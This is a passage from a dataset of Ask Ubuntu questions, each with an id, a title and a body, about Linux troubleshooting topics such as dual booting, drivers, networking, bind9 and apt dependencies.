cases useful info is found in syslog - try dmesg|tail or so now i know this question has been asked repeatedly but i do n't know what i am doing wrong . i would be grateful for any help . i have to save these photos .
425728	possible problems using wifi dongle + wired connetion together ?	because my internet provider modem isnt allowing network sharing for media servers and 300+mb/s ( for wired connection ) wireless routers are quite expensive . i added usb dongle to my pc . so now i have wired connection up to 1000mb/s ( connected to modem ) and wirelless dongle ( connected to central router that has wired connection to modem , uses second provided ip adress ) on same system . everything seems to be working fine except upnp server needs to be in one specified port , but can there be any hidden risks ? is there any additional setup needed ? how does system chooses which network adapter use as default ? can there be any conflicts ?
425730	how to add a key to an empty schema ?	i would like to automate setting some settings , specifically add some keyboard shortcuts to ~/.config/dconf/user . here is how it looks in dconf-editor : now gsettings ( or dconf ) can list the first one : $ gsettings get org.cinnamon.keybindings custom-list [ 'custom0 ' , 'custom1 ' , 'custom2 ' , 'custom3 ' ] however , i can not see a way to then add a new keybinding , or even to read the customx keys . $ gsettings get org.cinnamon.keybindings.custom-keybinding : / custom0 no such key 'custom0' how can i add , for example , a custom4 key with binding= ' < super > g ' , command='geany ' , name='geany ' ? output to donarssons answer : $ gsettings get org.cinnamon.keybindings.custom-keybindings : /custom0/ binding no such schema 'org.cinnamon.keybindings.custom-keybindings' $ gsettings get org.cinnamon.keybindings.custom-keybinding : /custom0/ binding '' and screenshot after the following command . note that custom4 does not go to custom-keybindings but to the root . gsettings set org.cinnamon.keybindings.custom-keybinding : /custom4/ binding ' < super > g' i 'm using linux mint as my o/s .
425731	straight into windoes while dual booted with ubuntu	i am dual booting a computer to build android but it is a family computer and my mother wants it so that it boots straight to ubuntu so she does n't have to choose ubuntu or windows . is there a way to set it where it boots straight to windows and if i want to boot into ubuntu i mash a button that takes me to a menu ? if so help would be appreciated . thanks everyone !
425732	how to check sample rate	i 'd like to use an external usb soundcard with my ubuntu 13.04 for musician purpose . unfortunately the application requires 48 khz and jackd to be used , but whenever i select the external souncard in qjackctl i see jackd falls back from 48 to 44,1khz . please is there a way to do that ? or at least a way to check/set the sample rate in the genuine ubuntu sound system , just to verify the card is 48k capable . thank you . ( the audio card is korg 's pandora px5d , and the chip inside is texas instruments tas1020b ) . thank you
425733	ubuntu 12.04 can not detect my second screen	what i wanted is a dual monitor setup but i got two monitors with the same content : ( . i have an asus z87-k motherboard and am connecting two monitors to its integrated graphics ( hdmi and vga ) . i installed ubuntu 12.04 . both monitors were showing me a mirrored screen . the option in `` monitor '' settings to untick `` mirror '' is disabled . display setting shows that there is only one monitor or ubuntu thinks there is only one monitor . i have gone through all posts to get my latest xorg intel video drivers . strangely , my monitor was detected as laptop screen . do you have any similar experiences ? how did you resolve it ? here 's some basic information : ~ $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1920 x 1080 , maximum 1920 x 1080 default connected 1920x1080+0+0 0mm x 0mm 1920x1080 0.0* 1280x1024 0.0 1024x768 0.0 800x600 0.0 640x480 0.0 ~ $ lspci -k|grep vga 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v3/4th gen core processor integrated graphics controller ( rev 06 )
425739	localhost not found xampp	i used xampp 2-3 months ago ... now i want to use it again and i have the same projects in the same folders but when i try to access localhost i recive a 404 not found error . i do n't understant why i have this error because i did n't changed anything . i have servername localhost in httpd.conf . i did n't change anything ... why now is n't working ? thank you edit : restarting web server apache2 ah00558 : apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 . set the 'servername ' directive globally to suppress this message
425743	installing a 3tb storage hdd with dual boot windows 7x64 and ubuntu 12.04ltsx64	i am in the middle of a build and ran into a problem with the gpt format of a 3tb hdd . the build is : asus a55bm-e motherboard . amd a10 processor black 7850 ( i think ) . seagate 1tb with ubuntu and windows installed ( mbr/legacy ) . amd radeon ram 8gb single stick 1600 mhz installing a toshiba 3tb hdd in gpt format both os 's are installed and functioning beautifully the 3tb was enabled as dynamic with disk management tool and is usable in windows i can not access it unless i run gparted or similar tools while in ubuntu ( as in it does not show up in the unity desktop anywhere ) the problem is that i do not want to format the drive for ubuntu for fear of losing access to it in windows . i researched the error and it was a sector alignment issue with ubuntu . from what i understand is that it is a simple fix just to realign the sectors to match ubuntu but will that unalign the sectors with windows ? i am building this for a friend and he needs access to it in both operating systems . is there a way to reconcile the issue here and align the drive with both os 's ? neither drive is an ssd the main problem is the size of the drive and the required format that has to come with that . thank you in advance !
425747	bind9 allow-recursion ?	we 've an allow-recursion statement for our primary name server . allow-recursion { localnets ; 192.168.100.0/24 ; } ; if you setup vlan 's do you need to add each subnet address , or will `` localnets '' cover them ?
425748	ethernet- device not managed after changing static ip	i have changed the ethernet static ip to the default wi-fi local ip . this is so that my local and public services work after switching from a wireless connection to ethernet . at first , the solution was to change the interfaces to : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.1.wifiaddresshere netmask 255.255.255.0 gateway 192.168.1.routeraddresshere however , after a server restart , i can no longer connect via ethernet and the only way to do so is to revert interfaces back to its original state , ie : auto lo iface lo inet loopback any suggestions as to how i can fix this issue ?
425753	skype 4.2 with ubuntu 12.04 64bit not work fine	hi i 'm ubuntu n00b that have some problems . i have installed the last version of skype by apt-get . when i start a videocall , skype crash after two/two and half minutes i do n't understand why it crash . when i start skype in the terminal , it appear this message giovanni @ giovanni-lenovo-z580 : ~ $ skype error : ld.so : object '/usr/lib/libv4l/v4l1compat.so ' from ld_preload can not be preloaded : ignored . can someone help me ?
425754	how do i run this sudo command inside a script ?	to do a patch manually i must type this command 'sudo ./playback_delete_data_patch.sh 09_delete_old_data_p.sql ' . there is a space just before the 09 : 'sudo ./playback_delete_data_patch.sh [ space ] 09_delete_old_data_p.sql' how can i run this inside a script ? there are also several other commands but this one is giving trouble .
425755	luks decryption step missing during boot after upgrade	i upgraded my 12.10 installation that was residing on an luks encrypted ext4 root partition . i did that with the 13.10 iso standard on a dvd . i booted into the test system , successfully mounted the old encrypted root partition from the harddisk and then choosed that during the manual 13.10 installation process . the installer was working okay but when it finished and i rebooted the machine , i was thrown to initramfs / busybox . i have no idea how i can mount my encrypted root from the harddisk now . i was trying to find my way through the grub.cfg on 13.10 ( after doing chroot back in the live system with 13.10 ) but the file is very cryptic to me ... i do n't understand that file . please help ! how can i get my encrpyted root mounted in initramfs ... either manually or ( better ) automatically . regards , hans
425756	how do i install 12.04 when i am using 13.8 ?	how do i install 12.04 when i am using 13.8 ? is there a way to go back to 12.04 or do i have to install it over the old os ?
425758	dual boot - windows 8/ubuntu	i bought a new desk top amd x64 pc . it came pre-installed with windows 8 . i installed the latest stable version of ubuntu with no problems . i now find that i ca n't access windows 8 because there is no dual boot menu on startup . i would n't bother except that i use some software that has no equivalent on linux systems . my question therefore is : how do i enable a dual boot menu ? i 'm not an experienced ubuntu user so i do n't understand much of the technical jargon contained in the responses to other questions related to dual boot that i have looked at
425759	drivers didnt install when installed ubuntu	i am running windows 7 on my laptop.i wanted to dual boot ubuntu in it.so i installed it using wubi.exe on another empty drive.the installation completed successfully . later when i restarted my laptop i got `` running on low graphics memory '' error and ubuntu tty1 terminal opened.i tried installing graphic drivers from there but apparently my wlan and lan drivers were also not installed . any suggestions on how to install drivers ?
425764	broadcom 4313 on ubuntu 12.04 have some problem	i have lenovo z58 laptop and i have installed ubuntu 12.04 the wifi hardware is broadcom and reading on-line hi have resolved the problem about driver now the wifi works . the problem is that when my laptop has been connected to wifi , the other devices have a big problem with surfing . can someone help me ? edit : giovanni @ giovanni-lenovo-z580 : ~ $ sudo lshw -c network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 05 serial : 08:9e:01:31:30:08 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory : f0404000-f0404fff memory : f0400000-f0403fff *-network description : wireless interface product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth2 version : 01 serial : c0:14:3d : c9:54:3b width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) ip=192.168.1.65 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:18 memory : f0500000-f0503fff
425767	i ca n't tell which dev/sda/ file is my external hard drive to install xubuntu on	i want to install xubuntu onto my external hard drive , but i can not tell what partition to use . here is what it shows dev/sda dev/sda1 ntfs dev/sda2 ntfs dev/sda3 ntfs dev/sda4 fat32 sda1-3 are windows 8 files , but i do n't know what the last one is , however i think it might be the hard drive , but i do n't want to erase anything .
425768	problem with keyring	i 'm using ubuntu 13.10 and see pop-ups of keychain app , asking me to enter keyring password after every autologin . yes , i see such popups afte enabling autologin . i googled this topic and set empty password . after reboot keychain wants me to enter my user password again ! i 've tried removing all passwords from folder `` login '' , but there is still no result .
425772	occasional lockup after boot	firstly i apologise if this is a duplicate of another question - i have seen many on a similar theme but not with these exact symptoms : dual-boot machine ( hp envy ) running ubuntu 13.1 64-bit ( originally 13.04 - same symptoms ) and windows 8 ( now 8.1 ) on an uefi firmware-bootloader ( or whatever the correct terminology for that is ) quite often boots fine with the login screen showing and the 'drum roll ' indicating it is ready-to-go sometimes boots to a purple screen - still a 'drum roll ' ( and the fingerprint scanner flashes ) but mouse pointer is stuck in the middle of the sceen can not do anything ( that i 've tried ) e.g . < ctrl > < alt > f1 does not switch to a terminal - only thing that works is to force power-off after the power-off/on cycle it might then boot to the login screen ( even though nothing has apparently changed ) or again to the locked purple screen win8 always boots up fine if selected from the uefi menu i think the baffling aspect is that the problem is intermittent : i wonder why it sometimes starts fine and other times not - something to do with timing ? what i 'd like is some pointer to how to debug such a problem - i appreciate it could be one of many things but presumably somewhere in the reams of system messages there is a clue ... how does one search for such a clue ? a grub issue ? a graphics driver problem ? i have lived with this for a while , which probably indicates that for a reasonable proportion of the time the system starts fine ( and of course the os is very effective once it runs ) . any hints ?
425775	omit filenames in grep	i am greping a string from multiple files , but the one undesired side effect , is the filename prefacing the output . how can i suppress the filename outputs using only grep ? $ grep -i lp lpnet* lpnet : this was printed via the internet using the lp command . lpnet : i believe lp doesnt care what the device is . lpnet1 : this was printed via the internet using the lp command . lpnet1 : i believe lp doesnt care what the device is . lpnet2 : this was printed via the internet using the lp command . lpnet2 : i believe lp doesnt care what the device is . lpnet3 : this was printed via the internet using the lp command . lpnet3 : i believe lp doesnt care what the device is . i have solved the issue for now using cat lpnet* | grep lp i am just wondering if there is a more efficient path to have the same effect
425777	trying to install libapache2-mod-wsgi on ubuntu 12.04 , but it says i have unmet dependencies	i have upgraded my server from ubuntu 10.04 to 12.04 , but when i run apache2 , it does n't understand wsgi , i i tried to install it with : # apt-get install libapache2-mod-wsgi it complained , saying : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . libapache2-mod-wsgi : depends : libpython2.7 ( > = 2.7 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . my /etc/apt/sources.list is : # ubuntu supported packages # gpg key : 437d05b5 deb http : //apt-cacher.lon.bitfolk.com/ubuntu/gb.archive.ubuntu.com/ubuntu precise main restricted deb http : //apt-cacher.lon.bitfolk.com/ubuntu/gb.archive.ubuntu.com/ubuntu precise-updates main restricted deb http : //apt-cacher.lon.bitfolk.com/ubuntu/security.ubuntu.com/ubuntu precise-security main restricted # ubuntu community supported packages # gpg key : 437d05b5 deb http : //apt-cacher.lon.bitfolk.com/ubuntu/gb.archive.ubuntu.com/ubuntu precise universe multiverse deb http : //apt-cacher.lon.bitfolk.com/ubuntu/gb.archive.ubuntu.com/ubuntu precise-updates universe multiverse deb http : //apt-cacher.lon.bitfolk.com/ubuntu/security.ubuntu.com/ubuntu precise-security universe multiverse i 've tried following the steps in how do i resolve unmet dependencies ? , without success . addendum . i 've just read unmet dependencies in ubuntu 12.04 which says : the probable causes of this kind of problem are : you installed an essential system package like python from a latest ppa , and then removed the ppa , since many packages are dependent on python package and since , apt-get always try to install highest versioned package and packages in official repository is not the highest one , it will not downgrade , but give you error if you added a ppa , and remove that later , you should add that ppa again , do sudo apt-get update and try again . it should work . unless that ppa is not working now , in that case , you are very unlucky now ) that 's exactly what i did ( i was running ubuntu 10.04 and wanted to upgrade to python 2.7 so got it from a ppa . unfortunately i do n't remember the address of the ppa . )
425781	differences between ping and ping -c 3 option	i would like to know what the differences between using the commands : ping -c 3 www.google.com and ping www.google.com any help or information is appreciated . thanks !
425784	which is better for a home media server : zfs or btrfs or lvm/md ?	i 'm looking at building a new home server and would like a flexible filesystem . both btrfs and zfs are interesting . i want to be able to do soft raid and have flexible solution allowing me to expand storage easily as i add hard drives . not interested in hardware raid due to cost . since this is a non-essential server , i 'm willing to play around and take some risks . this media server will be available over the internet for remote playback . most likely will run plex media server software . i 'm thinking of running ubuntu 12.04 since some of the software i want to use seems only supported on the lts . appreciate any advice . edit : changed title to include lvm + md software raid .
425789	how to capture screen in ubuntu 12.04	i 'm new to linux . however i already enjoy what i see . my question is , how do you make a screen shot when using the desktop , and what program ( s ) would i go about using to do it ? i would also like to know how to take a screen capture using the command line .
425790	how to install a dwfx plotter ?	i need to output a dwfx file for city council approval ( architectural drawing made with draftsight ) . under windows , i would just output the sheets to pdf and then merge and convert them to dwfx under autodesk design review app . i still have n't found a similarly functional application for ubuntu . i would appreciate any suggestions .
425791	differences between df , df -h , and df -l	question what are the differences between the following commands ? df df -h df -l feedback information is greatly appreciated . thank you .
425792	ubuntu server boots fine on desktop , wo n't boot when hdds moved to headless server	i 've got a hp mediasmart ex490 which i 've now wiped and installed ubuntu server on . when the hdds are in my desktop , it works fine , but as soon as i swap the the hdds over to the hp - i ca n't even ping it . i thought the static ip i had set was n't working , so i set up a cron job to dump ifconfig data in to a log file and nothing was dumped - even when set to run every single minute . for that reason i do n't think it 's even booting in properly , but there 's no monitor port on it and i ca n't ssh in without network access . how do i debug the issue ?
425798	unable to install grub in /dev/sda on two-drive laptop with win7	i am using an hp dv7 computer with a 1tb drive with win7 and a new 120gb ssd that i intend to run kubuntu on for my physics stuff . i am having trouble installing grub though . i first created two partitions on the ssd : main ( 111gb ) and swap ( 9gb ) . then , using kubuntu boot usb ( clean formatted with new iso and good md5sum ) , i tried to install on manual to reduce the chance i 'd screw up my windows . i really really do n't want to screw up my windows . i set main ( sdb1 ) as / and swap ( sdb2 ) as swap , leaving all of sda as do not use , and set it to install the bootloader to sda , which is where the win7 mbr should be . however , after almost completing the install , it gives me a pop-up of : unable to install grub in /dev/sda executing 'grub-install /dev/sda ' failed . this is a fatal error . grub installs fine if my ssd is in sda , but then my windows does n't work because my motherboard can only boot to `` internal notebook drive '' , also known as sda , and sda is always c , which windows needs to be in to work . so my ssd must be sdb . what reasons might cause this ? is my methodology sound , and how can i improve it ? what other info would be helpful in diagnosing the problem ?
425806	i need a program like microsoft silverlight ?	i 'm new to using ubuntu and i 've never really heard of the program so i know nothing about it . i had regular windows when i bought this computer , but had a major file corruption and my boyfriend 's uncle completely wiped my software replacing it with ubuntu . all that aside , i really need a program that works just as well as microsoft silverlight for work so i can get my schedule to show up through dayforce . i 've googled somethings hoping to help , but it seemed very complicated and i am not very knowledgeable about this stuff . can anyone explain what to look for and how do i need to install it ?
425807	ubuntu 13.10 wo n't restart unless windows 8.1 is first started and then shutdown	this is very strange . i have an ubuntu 13.10/windows 8.1 dual boot set up on my asus n56vz laptop . after shutting down ubuntu , i ca n't restart it unless i first start and shutdown windows 8 . i 'm not sure where to start on this . when i boot in recovery mode , it seems to hand on `` loading initial ramdisk '' any suggestions ? thanks
425808	/etc/network/interfaces configuration messed up	i 'm trying to setup a virtualized server up with kvm on my ovh server . however , when configuring the network , i 'm encountering some issues . any help in any form is greatly appreciated ! this is my current , working setup # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback auto eth0 iface eth0 inet static address ( public ip ) netmask 255.255.255.0 network ( public ip ) .0 broadcast ( public ip ) .255 gateway ( public ip ) .254 in order to set up my virtualized server , i need to set up another network for the virtualized instance to go through . so , i tried adding this to my interfaces file : auto br0 iface br0 inet static address 192.168.40.134 network 192.168.40.0 netmask 255.255.255.0 broadcast 192.168.40.255 gateway ( public ip ) .254 dns-nameservers 8.8.8.8 8.8.4.4 bridge_ports eth0 bridge_fd 9 bridge_hello 2 bridge_maxage 12 bridge_stp off however , restarting the network setup causes the server to become inaccessible over the internet . i 've tried multiple times different variations to get this to work , however , it 's becoming tedious to boot the server into rescue mode , fix it , and get out . once again , thanks in advance !
425809	where are the logs for apt-get ?	request i would like to know where i can find the logs for the following package managers . package managers synaptic package manager ubuntu software center terminal logs for apt-get and the logs when using the terminal with apt-get appreciation any help would be appreciated . thanks !
425813	shut down without extra question	when i select shutdown in the top right corner , i get an extra question in a new window in the middle of the screen with a big button to shut down . how can i directly shut down ubuntu 13.10 , without extra question ?
425816	downloading ubuntu 13.10	i donated for a download of ubuntu 13.10 and was three quarters through downloading when it suddenly stopped . i tried again and it stopped again about 15 % through the download . what is happening ?
425817	how can i encrypt my home folder after a ubuntu server 13.10 install ?	i would like to know the command ( s ) to enable the encryption of my home directory after installing a ubuntu server with a release version of 13.10 . note : this is a ubuntu server install , not a desktop install .
425819	ardesia not working	i 'm working with ubuntu 13.10 x64 on a toshiba satellite s55 type laptop machine ( i7 , 16gb ram and a touchscreen , killed uefi for a regular boot ) and i 'm having trouble getting ardesia to do anything useful . ( and i apologize for not having any good tags on this , the only one i could find that was n't plain wrong was 13.10 ) i installed it direct from the ubuntu software center , it reports version 1.1 in the help files . when i start it , after i select a project ( ... test , since i have n't done anything with it yet ) i get a tool bar on the right hand side , and the mouse pointer turns into a pencil with a red circle around its tip . however if i try to draw , i see nothing . if i try to change tools , i get no effect ( and i ca n't change to the mouse pointer either ) . if i quit out of it , which i am able to do by moving over the launcher icons on the ubuntu ... not sure what it 's called , but the thing down the left hand side of the screen that has icons for your most-used software ... i can right click on the ardesia icon and quit from there . anyway , if i quit , i see the graphics that i would have drawn momentarily and then they disappear as the program quits . i find that if i do not try to draw , but just select different tools right after startup , this seems to be successful ( mostly ) but the moment i try to draw , all the controls lock up . i also note that if i try to select the keyboard tool , it makes the whole screen gray momentarily and then crashes ardesia . any thoughts anyone ? i 'd really like to be able to use this tool , but right now i clearly ca n't do anything with it . by the way , i have no big requirement that it must be this specific tool . i want to be able to do on-screen annotations over the top of other software that i 'm using , and i need to be able to record the screen while i do it . i suppose i could use two different tools for this if that worked out easier ... tia , simon
425824	`` could not write bytes : broken pipe '' windows update	i had ubuntu 12.04 working fine , but since i ran some windows updates in my win7 partition , it 's been freezing at `` could not write bytes : broken pipe '' during startup . i 'm sorry i do n't have any more specifics - i can access the root shell prompt via recovery mode , so i 'm open to any suggestions for initial diagnostics . the machine is an asus a73e , which apparently has a `` intel graphics media accelerator '' graphics card .
425826	how to find packages that are not listed in aptitude	often there are some packages that i was required to install as prerequisites of some tools , but are not listed in the aptitude package list ( or with a slightly different name ) . for example , i once encounter an error saying `` libstdc++.so.6 : can not open shared object file : no such file or directory . `` , and by searching the error i resolved it by run `` sudo apt-get install lib32stdc++6 '' . so the required package is lib32stdc++6 , how could i tell it from the name libstdc++.so.6 ?
425828	installation help : i am working with a mac os 10.5.6 , and need help with the .iso conversion	i am not the most fluent of computer people out there , and my os is beyond outdated . so , i 'm following the instructions for using a flash drive to wipe and install ubuntu . however , my terminal skills are not that great . here is what 's happening when i put in what i understand as the correct paths : my-macbook-2 : ~ $ hdiutil convert -format udrw -o ~/volumes/ ~/users/lilis/downloads/ubuntu-12.04.4-desktop-amd64.iso hdiutil : convert failed - no such file or directory any ideas or help ? thank you ahead of time .
425829	how do i get the driver for my graphics card ?	i would like to get the correct driver for my graphics card . i am running ubuntu 13.10 . i think i have an ati radeon hd4200 integrated graphics chip , but when i go into system details , ubuntu says the driver is `` gallium 0.4 on amd rs880 . '' is this the correct driver ? if not , how can i install the correct one ? p.s . i am a total ubuntu newbie , have used ms windows all my life . step by step explanations please
425834	swap not available	when i open system monitor and click resources , the chart has swap at 0 % and says `` swap not available '' . i was triple booting on my computer , but i removed one of the distros , so that probably has a lot to do with it . but i do n't remember when i 1st noticed this problem and i do n't know how to fix it . someone else has posted about this , but their question remains unresolved .
425835	ca n't use alt-tab to switch between windows	alt-tab used to work in unity on my ubuntu 12.04 desktop . i installed gnome-session-fallback and logined using gnome classic . now this key combination does n't work any more . i checked ccsm , in the `` windows management '' , i do have `` static application switcher '' enabled , binding tab includes `` tab '' for `` next window '' . what 's going on ? thanks .
425839	steps to install 32 bit wine on 64 bit 12.04 lts	any help on this matter would be appreciated . i have 64 bit 12.04 lts installed , i am looking for everything needed , step by step order to install 32 bit wine in order to run windows 32 bit software and drivers to connect to usb devices in order to download stored collected data . since the end of free support for windows xp is approaching i am jumping to linux in order to continue using perfectly good hardware . the drivers can not be upgraded to work with current windows versions , the company has long been out of business . why be forced to stop using perfectly good operating hardware when an os is no longer supported . i am trying to do this with the currently installed 64 bit 12.04 lts without having to uninstall the 64 bit and install the 32 bit version or should i just ditch the 64 bit and start over with the 32 version of ubuntu ? i have some experience with linux but am no expert by any means . thanks for any help .
425840	bind9 local network ; can not ping fqdn	how is this possible ? from client : the following works : ajonen8940 @ aj-thinkpad-t60 : ~ $ host ubuntumedia.ubuntumediagz.local ubuntumedia.ubuntumediagz.local has address 192.168.1.104 this does not work : ajonen8940 @ aj-thinkpad-t60 : ~ $ ping ubuntumedia.ubuntumediagz.local ping : unknown host ubuntumedia.ubuntumediagz.local this works : ajonen8940 @ aj-thinkpad-t60 : ~ $ ping ubuntumedia ping ubuntumedia.ubuntumediagz.local ( 192.168.1.104 ) 56 ( 84 ) bytes of data . 64 bytes from ubuntumedia.ubuntumediagz.local ( 192.168.1.104 ) : icmp_req=1 ttl=64 time=4.31 ms here is my resolve.conf on the client : nameserver 127.0.0.1 search ubuntumediagz.local here is nslookup : $ nslookup ubuntumedia server : 127.0.0.1 address : 127.0.0.1 # 53 name : ubuntumedia.ubuntumediagz.local address : 192.168.1.104 thanks for any ideas .
425842	how do i remove a video driver that breaks my system ?	i recently installed an nvidia driver from the nvidia website that has since prevented me from logging in . i can get to the login page , but after i enter my password , my screen goes black with just the cursor . how can i fix this ? thanks !
425847	ifconfig can not detect eth0 . only detecting wlan0 and lo	lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1173 errors:0 dropped:0 overruns:0 frame:0 tx packets:1173 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:198294 ( 198.2 kb ) tx bytes:198294 ( 198.2 kb ) wlan0 link encap : ethernet hwaddr 00:26 : c7:4b:86:16 inet addr:157.252.183.83 bcast:157.252.191.255 mask:255.255.224.0 inet6 addr : fe80 : :226 : c7ff : fe4b:8616/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:117826 errors:0 dropped:0 overruns:0 frame:0 tx packets:36111 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:97215638 ( 97.2 mb ) tx bytes:5401621 ( 5.4 mb ) i want to connect using ethernet
425851	nvidia driver for macbook pro 9,1	i am current using the default nouveau driver on my macbook pro 9,1 . i tried installing nvidia-current , then ubuntu just went blank after restart . is there any safe way to install nvidia proprietary driver ?
425854	how to mount file type	i have recently imaged some floppy disks to img files . the disks had some bad blocks . so i am trying to figure out the file system type , so that i can mount , and repair the files . i tried $ sudo fdisk -l /dev/fd0 which returned nothing . $ sudo file -ls /dev/fd0 /dev/fd0 : data is data the fs type ? how can i mount / repair this image type ? $ sudo file -ls lisa1.img /dev/stdout : data
425859	how to list installed network cards in ubuntu ( using terminal )	how to list all network cards installed in my ubuntu using a single terminal command ? any help ?
425863	how do i restore boot gui and login of ubuntu 13.10 to the original ?	okay , so i installed a few extra desktop environments , one of which was the xubuntu pack , and it replaced my login screen and boot gui as mentioned . i made the mistake of trying to purge lightdm and reinstalling it , but the boot gui hasnât changed and the login screen is even further from what i wanted . what can i do to correct it ? all i want is what came with ubuntu 13.10 saucy .
425866	why am i not able to lower my screen brightness ?	i modified the brightness in the brightness settings and locked it but the brightness in the screen did not change . i have ubuntu 13.10 , but with previous versions you could not change , my computer is an acer v3 571-6413 .
425867	ca n't get ubuntu to load on a mid 2009 macbook pro	hey amazing ubuntu people . i 'm sure you 've seen many messages like this , but i 'd really like to join your community and i 'd appreciate help to get past the initial hurdle . i 've managed to install ubuntu before on a chromebook , but i want to see what ubuntu feels like on a more capable machine and i ca n't seem to get it to install on my mid 2009 macbook pro ( model 5,3 ) . i 've followed the commands here : https : //help.ubuntu.com/community/macbookpro5-3/precise i 'm booting from a dvd and trying to install a single boot setup . i get the initial screen where there are two icons at the bottom that seem to look something like a little man and a keyboard ? anyways , then that screen disappears and i get one little garbled white character in a red square 4cm to the right of the top left corner of my screen and it just stops there . does anyone know what i can do to move past this ? i reformatted the disk before installing , will the type of formatting i do possibly effect the process ? any help you could provide would be appreciated and i promise to pass on the karma . thank you ! ! !
425868	can not connect to wifi after wired connection	i recently install ubuntu 12.04 lts on my dell vostro 1510 laptop . my wifi card is a broadcom bcm4312 802.11 b/b lp-phy and i can connect to wireless home network without a problem ... here 's my dilemma ... if i plug in a wired connection from my laptop directly to my router i connect via `` wired network '' , however , when i unplug the wire , the laptop will not re-connect wirelessly ... as a matter of fact , it seems like the wifi card in not even installed . there is no option to connect to the wireless router and the wireless networks option is greyed out in all settings please any help would be appreciated
425869	acer lcd monitor displays my desktop but not any content	i can see my screen background , time , battery , sound , etc from my mac air . but none of the content ? on the screen
425870	ca n't find home wireless	yesterday my laptop worked fine but today it ca n't find my home wireless network . it can find other networks nearby . just not the home one . my phone can find and connect to the home one fine . i 've reset both the modem and my laptop multiple times . i 've tried removing the stored network and adding it again . i 've tried searching for similar problems , i just ca n't work it out . help please . *-network description : ethernet interface product : netlink bcm57780 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 01 serial : 70:5a : b6 : f6:50 : b6 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.121 duplex=full firmware=sb ip=192.168.1.12 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:44 memory : b6100000-b610ffff *-network description : wireless interface product : bcm43225 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth1 version : 01 serial : 78 : e4:00 : f5 : bb:6c width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : b5100000-b5103fff
425871	ubuntu not working on my tecno f8	i have done all the necessary installation s but ubuntu refuses to boot this is a screenshot of what it shows on the terminal
425872	add space on existing ext4 ubuntu partition	i have ubuntu 13.10 installation on a 30gb ext4 partition dual booting with windows 7 taking the rest of the disk space of 320gb hd . my ubuntu partition is full and i get 'no space left ' error on which i 've been deleting few user files to free up the memory and continue using it . this can not continue forever . so , i have come up with two options to for fixing this : 1 ) shrink a windows partition and extend the ext4 partition with the unallocated space obtained by shrinking win7 parttion . how to do this ? ? 2 ) re-partition and make clean ubuntu installation . however , i do n't want to make clean installation . so , i want some guide for option-1 or if there is better option to do this without affecting ubuntu installation , that 'll be awesome . thanks in advance .
425873	ubuntu slow download connection	i just installed a fresh copy of ubuntu 13.10 and i tried to download ubuntu restricted extras but the downloading connection is pretty slow compared to the download speed on ms windows . how to fix this ?
425876	nothing shows up	just restarted my computer and this happens , tried switching desktop managers and the same thing . help ?
425877	not enough space to build proposed filesystem while setting up superblock	just bought a new external drive . plugged it in , erased current partition using fdisk and created a new extended partition using fdisk . used all the defaults for start and end blocks : i then try to format the new partition using the following : sudo mkfs.ext4 /dev/sdb1 however , i received the following error : mke2fs 1.42 ( 29-nov-2011 ) /dev/sdb1 : not enough space to build proposed filesystem while setting up superblock any ideas what could be wrong ? should i have created a primary partition ? if so , why ?
425882	why is libreoffice writer insistent upon replacing text when i try to insert it ?	when i try to go back in a document and add text libreoffice writer replaces pre-existing text rather than just adding the text i want to . why is this happening and how can i fix it ?
425883	unusual graphic glitch in settings menu , among other windows	so i have this issue with how windows display in windows most prevalently in all settings menus , and i ca n't resize the window . i honestly have no idea what to call it , but it is an inconvenience that i 'm sure others have had in ubuntu 13.10 saucy .
425887	in a cybercafe - how to make the ubuntu 13.10 to be auto deepfreeze ?	i have installed 10 ubuntu 13.10 in a cybercafe for daily about 300 users to use the pc , but its a nightmare with ubuntu cause people just use internet and make the system hell . how can i deep freeze it ? on reboot it go back to yesterday always ? so that it works like one day use but always goes back to my first installation on each reboot ?
